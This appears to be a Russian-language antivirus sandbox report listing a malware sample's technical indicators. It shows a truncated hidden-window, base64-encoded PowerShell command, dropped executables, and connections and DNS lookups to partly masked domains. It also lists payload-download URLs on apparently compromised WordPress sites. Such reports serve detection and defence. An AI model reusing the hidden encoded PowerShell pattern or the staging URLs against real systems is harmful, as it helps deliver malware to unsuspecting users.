Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHcAdQBiAHoAcQB0AG8AaQBvAD0AJwBHAHMAeAB2AGwAbABoAHIAbAAnADsAJABNAHEAdQB3AHYAZAB0AHAAZAB0AGEAIAA9ACAAJwA3ADcAOQAnADsAJABOAGMAdQBuAHAAZwByAGwAcgBmAG8APQAnAFcAeQBrAGgAYgBlAGIAZwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1166606.cvr
- %HOMEPATH%\779.exe
- %HOMEPATH%\779.exe
- 'di###pushti.org':80
- 'di###pushti.org':443
- 'le####nosduvexin.fr':80
- 'le####nosduvexin.fr':443
- 'cs###hop.com':80
- http://www.di###pushti.org/wp-admin/cmLoLV/
- http://www.le####nosduvexin.fr/revslider0/htr/
- http://cs###hop.com/wp-admin/0kuev1/
- http://www.cs###hop.com/wp-admin/0kuev1/
- 'di###pushti.org':443
- 'le####nosduvexin.fr':443
- DNS ASK di###pushti.org
- DNS ASK le####nosduvexin.fr
- DNS ASK cs###hop.com
- DNS ASK ch#####est.bodait.com
- DNS ASK st######ntistico-candeo.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHcAdQBiAHoAcQB0AG8AaQBvAD0AJwBHAHMAeAB2AGwAbABoAHIAbAAnADsAJABNAHEAdQB3AHYAZAB0AHAAZAB0AGEAIAA9ACAAJwA3ADcAOQAnADsAJABOAGMAdQBuAHAAZwByAGwAcgBmAG8APQAnAFcAeQBrAGgAYgBlAGIAZwB...' (со скрытым окном)